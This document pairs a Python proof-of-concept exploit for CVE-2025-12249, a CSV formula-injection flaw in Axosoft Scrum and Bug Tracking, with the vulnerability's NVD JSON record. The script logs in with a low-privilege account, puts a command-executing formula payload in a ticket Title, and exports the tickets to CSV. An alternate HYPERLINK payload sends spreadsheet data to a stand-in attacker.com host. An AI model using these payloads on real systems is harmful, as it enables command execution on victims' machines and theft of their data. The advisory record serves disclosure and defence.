CVE-2025-12249

import requests import urllib3 urllib3.disable_warnings() # CVE-2025-12249 PoC - CSV Injection in Axosoft Scrum and Bug Tracking # Target: Axosoft Scrum and Bug Tracking 22.1.1.11545 # Attack Vector: Edit Ticket Page - Title Parameter TARGET_URL = "https://target-axosoft-server.com" LOGIN_URL = f"{TARGET_URL}/api/auth/login" EDIT_TICKET_URL = f"{TARGET_URL}/api/tickets/edit" EXPORT_CSV_URL = f"{TARGET_URL}/api/tickets/export" # Malicious CSV payload - formula injection CSV_PAYLOAD = "=CMD|'/C calc'!A0" # Calculator execution payload CSV_PAYLOAD_ALT = "=HYPERLINK(\"http://attacker.com/steal?data=\"&A1,\"Click Here\")" def exploit_csv_injection(): """ Step 1: Authenticate with low-privilege account Step 2: Create or edit a ticket with malicious Title Step 3: Export tickets to CSV Step 4: When victim opens CSV, formula executes """ session = requests.Session() # Authentication login_data = { "username": "low_priv_user", "password": "user_password" } resp = session.post(LOGIN_URL, json=login_data, verify=False) if resp.status_code != 200: print("[-] Authentication failed") return False print("[+] Authentication successful") # Edit ticket with malicious Title edit_data = { "ticket_id": 12345, "Title": CSV_PAYLOAD, # Inject malicious formula "Description": "Normal description" } resp = session.post(EDIT_TICKET_URL, json=edit_data, verify=False) if resp.status_code == 200: print("[+] Malicious ticket updated successfully") print(f"[+] Payload injected: {CSV_PAYLOAD}") else: print("[-] Failed to update ticket") return False # Export CSV (victim action) print("[*] Victim exports tickets to CSV...") resp = session.get(EXPORT_CSV_URL, verify=False) if resp.status_code == 200: print("[+] CSV exported with malicious payload") # Save exported CSV with open("exported_tickets.csv", "w") as f: f.write(resp.text) print("[+] CSV saved to exported_tickets.csv") return True if __name__ == "__main__": print("=" * 60) print("CVE-2025-12249 - Axosoft CSV Injection PoC") print("=" * 60) exploit_csv_injection()

{"cve": {"id": "CVE-2025-12249", "sourceIdentifier": "[email protected]", "published": "2025-10-27T08:15:37.763", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Axosoft Scrum and Bug Tracking 22.1.1.11545. The impacted element is an unknown function of the component Edit Ticket Page. Performing manipulation of the argument Title results in csv injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-1236"}]}], "references": [{"url": "https://drive.google.com/file/d/1EtmG4IyNQO7VStycpkSl9iivURrYQBSD/view?usp=sharing", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.329920", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.329920", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.673851", "source": "[email protected]"}]}}